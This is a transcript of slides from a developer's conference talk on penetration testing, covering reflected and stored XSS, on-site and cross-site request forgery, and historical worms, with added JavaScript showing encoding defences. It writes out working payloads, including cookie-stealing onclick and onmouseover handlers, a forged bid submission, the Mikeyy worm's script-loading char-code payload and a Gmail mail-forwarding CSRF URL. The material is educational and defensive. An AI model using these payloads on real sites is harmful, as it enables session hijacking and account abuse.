This was a full-length talk presented by Amit Dhakkad at vodQA-3: A QA Meet, held at ThoughtWorks, Pune.

  1. Amit Dhakad
     Application Developer
     Is considered a "survivor"
     Likes to read about black magic & illusions
  2. What, why and how's of Penetration Testing
     - Amit Dhakad, Developer
  3. What do I plan to cover?
     What is Penetration Testing?
     XSS
       What is it?
       Types of XSS: Reflective XSS, Stored XSS
     Request Forgery
       What is it?
       Types of Request Forgery: On-site request forgery, Cross-site request forgery
     Demo
     Attack mechanisms
     Real world examples
     Why do we need to pay attention?
  4. Penetration Testing
     Simulating a malicious attack on a system, with the owner's authorization, to find exploitable weaknesses before a real attacker does
  5. Cross-site scripting (XSS)
     Injecting JavaScript into a page through user-controllable input that the application echoes back without encoding it for the HTML context it lands in
  6. Reflective XSS
     Injecting JavaScript through URL parameters that the server reflects straight into the response
  7. Diagram courtesy: The Web Application Hacker's Handbook
  8. Attack: http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
     The query value is echoed inside a double-quoted attribute; the " closes that attribute, and onclick adds a handler that sends document.cookie to the attacker's logging endpoint (%2B is the URL-encoded +).
  9. Stored XSS
     Exploiting the server's ability to persist user input: the payload is saved once and served to every user who views it
  10. Diagram courtesy: The Web Application Hacker's Handbook
  11. Attack: the profile image URL is set to
      http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
      The stored URL is placed unencoded into the img tag's src attribute; the " breaks out of it, and onmouseover sends the viewer's cookie to the attacker's logging endpoint.
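Added example for slides 6 to 11 (not code from the talk or its demo app): the two attribute-context payloads above, run against a template that interpolates raw input and against the same template with HTML-attribute encoding. The page shapes (a search box echoing ?query=, a profile img whose src is a stored URL) and all function names are assumptions modelled on the demo; the payloads are the slide payloads as the server sees them after URL decoding.

```javascript
// Added example (not code from the talk or its demo app): the reflective and
// stored XSS payloads from the slides against raw interpolation and against
// HTML-attribute encoding. Page shapes and function names are assumptions.

// Encode a value for a double-quoted HTML attribute (also safe in text nodes).
// "&" is replaced first so the entities produced later are not re-encoded.
function encodeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Reflective XSS: the search term is echoed into the value attribute.
function renderSearchVulnerable(query) {
  return `<input type="text" name="query" value="${query}">`;
}
function renderSearchSafe(query) {
  return `<input type="text" name="query" value="${encodeHtmlAttr(query)}">`;
}

// Stored XSS: the persisted profile image URL is echoed into src.
function renderAvatarVulnerable(imageUrl) {
  return `<img src="${imageUrl}">`;
}
// Hardened: src is a URL context as well as an attribute context, so the value
// is parsed, restricted to http(s) (rejecting javascript: and data:),
// canonicalised, and only then attribute-encoded.
function renderAvatarSafe(imageUrl) {
  let url;
  try { url = new URL(imageUrl); } catch (e) { return `<img src="">`; }
  if (url.protocol !== "http:" && url.protocol !== "https:") return `<img src="">`;
  return `<img src="${encodeHtmlAttr(url.href)}">`;
}

// Attribute names of the first tag in `html`, applying the rule the HTML
// tokenizer uses: a new attribute may begin immediately after a quoted value,
// which is exactly what value="title"onclick="..." relies on. Simplified
// tokenizer for this demonstration only (no comments, no CDATA).
function attributeNames(html) {
  const names = [];
  let i = html.indexOf("<");
  if (i < 0) return names;
  i += 1;
  while (i < html.length && !/[\s\/>]/.test(html[i])) i += 1;  // tag name
  while (i < html.length) {
    while (i < html.length && /[\s\/]/.test(html[i])) i += 1;   // separators
    if (i >= html.length || html[i] === ">") break;
    let name = "";
    while (i < html.length && !/[\s=\/>]/.test(html[i])) name += html[i++];
    names.push(name.toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i += 1;
    if (html[i] === "=") {                                        // attribute value
      i += 1;
      while (i < html.length && /\s/.test(html[i])) i += 1;
      const quote = html[i];
      if (quote === '"' || quote === "'") {
        i += 1;
        while (i < html.length && html[i] !== quote) i += 1;
        i += 1;                                                   // closing quote
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) i += 1;
      }
    }
  }
  return names;
}

// The slide payloads, URL-decoded as the server would see them (%2B -> +).
const REFLECTED_PAYLOAD =
  "title\"onclick=\"window.location.href=('http://localhost:3000/log?message='+document.cookie)";
const STORED_PAYLOAD =
  "http://www.myflorida.org.uk/images/disney_gif/Donald.gif\"onmouseover=\"window.location.href=('http://localhost:3000/log?message='+document.cookie)";

// Did rendering `value` through `render` produce an on* event-handler attribute?
function injectsHandler(render, value) {
  return attributeNames(render(value)).some((n) => n.startsWith("on"));
}
```

The check is deliberately structural rather than a keyword search: it asks whether the payload produced a new attribute, which is the thing a browser acts on. Note that encoding alone does not make the src safe; a stored value of javascript:alert(1) is a well-formed attribute and still runs, which is why renderAvatarSafe also restricts the scheme.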
  12. Request Forgery
      Performing actions on behalf of the user without the user's knowledge
  13. On-site Request Forgery (OSRF)
      The forged request originates from the same domain (for example from stored user content)
  14. Attack with XSS: the image URL is set to
      http://www.myflorida.org.uk/images/disney_gif/Donald.gif" onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
      The script runs inside the viewer's page, fills in the page's own bid form and submits it, so the request carries whatever the form already contains.
  15. Attack without XSS: the image URL is set to /bids?bid[amount]=500&bid[auction_id]=1
      No script is needed: the viewer's browser fetches the "image" with the user's session cookie attached, and the application places a bid in response to a plain GET.
  16. Cross-site Request Forgery (CSRF)
      The forged request originates from a different domain
  17. Same origin policy
      A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
      A page residing on one domain can load a script from another domain and execute it within its own context.
  18. What can you do with XSS and Request Forgery?
      Session hijacking
      Performing arbitrary actions as the user
      Disclosure of user data
  19. Real world attacks
  20. MySpace worm by Samy (XSS + OSRF)
      Bypassed all filters and added a script to his profile
      The script did two things:
        Added Samy as a friend of the visiting user
        Copied itself into the visiting user's profile
      Anyone visiting a newly infected profile was also added as Samy's friend.
  21. Protection: MySpace strips out the word "onreadystatechange", which is necessary for XML-HTTP requests
      Attack: eval('xmlhttp.onread' + 'ystatechange = callback');
  22. eBay – discovered by Dave Armstrong (OSRF)
      A crafted URL was set as an image URL
      An arbitrary bid was placed on behalf of the visiting user
  25. Mikeyy twitter worm (XSS + OSRF)
      Implemented by a 17-year-old
      Payload: "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
      which decodes to: <script src="http://www.stalkdaily.com/ajax.js"></script>
      Visiting users got infected
      Infected users began tweeting unwittingly.
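Added example for the Samy (slides 20 and 21) and Mikeyy (slide 25) entries, not code from the talk: it shows the mechanism behind both filter evasions, namely that the token a filter looks for never appears in the submitted text and only exists once the browser assembles it at run time. The blocklist is an assumed stand-in, not MySpace's or Twitter's real filter; the only entry the talk documents is "onreadystatechange", and the host-name entry is added here only to show the same effect on the char-code payload.

```javascript
// Added example, not from the talk. BLOCKED_WORDS is an assumed stand-in for
// the sites' real filters; only "onreadystatechange" comes from the slides.
const BLOCKED_WORDS = ["onreadystatechange", "stalkdaily.com"];

// Naive server-side filter: delete every occurrence of each blocked word.
function keywordFilter(input) {
  let out = input;
  for (const word of BLOCKED_WORDS) out = out.split(word).join("");
  return out;
}
function passesFilter(input) {
  return keywordFilter(input) === input;   // unchanged means nothing was stripped
}

// Samy's fragment (from slide 21): the property name is split across two
// string literals and joined only when eval runs.
const SAMY_FRAGMENT = "eval('xmlhttp.onread' + 'ystatechange = callback');";

// Run the fragment in a scope that mimics the page: a request object and a
// callback. Direct eval sees these locals, so the handler gets installed even
// though "onreadystatechange" never appears in the source text.
function runSamyFragment() {
  const xmlhttp = {};
  const callback = function () { return "called"; };
  eval(SAMY_FRAGMENT);
  return typeof xmlhttp.onreadystatechange === "function" &&
    xmlhttp.onreadystatechange() === "called";
}

// Mikeyy's payload (slide 25) carries the whole <script> tag as character
// codes, so neither the tag nor the host name appears literally.
const MIKEYY_CODES = [60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62];
const MIKEYY_PAYLOAD =
  `"><title><script>document.write(String.fromCharCode(${MIKEYY_CODES.join(",")}));</script>`;

function decodeCharCodes(codes) {
  return String.fromCharCode.apply(null, codes);
}
```

Both payloads pass the keyword filter unchanged while their decoded or evaluated forms would not, which is the general point: a blocklist inspects the bytes that were submitted, but the browser acts on what the script builds afterwards. The control that holds is contextual output encoding at render time, not a longer word list.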
  26. Gmail vulnerability – discovered by Petko Petkov (CSRF)
      http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
      A cross-site POST, sent while the victim is logged in, adds a filter that forwards all of the victim's mail to the attacker's address
  27. Why do we need to pay attention?
      The shift is towards attacking clients
      The underlying technologies don't provide strong protection by default
      These are often dismissed as "lame" attacks
      Identifying them with automated tools is difficult
      Penetration testing is treated as a separate vertical
  28. Break your own walls before anyone else does
  29. Q & A
  30. Thank you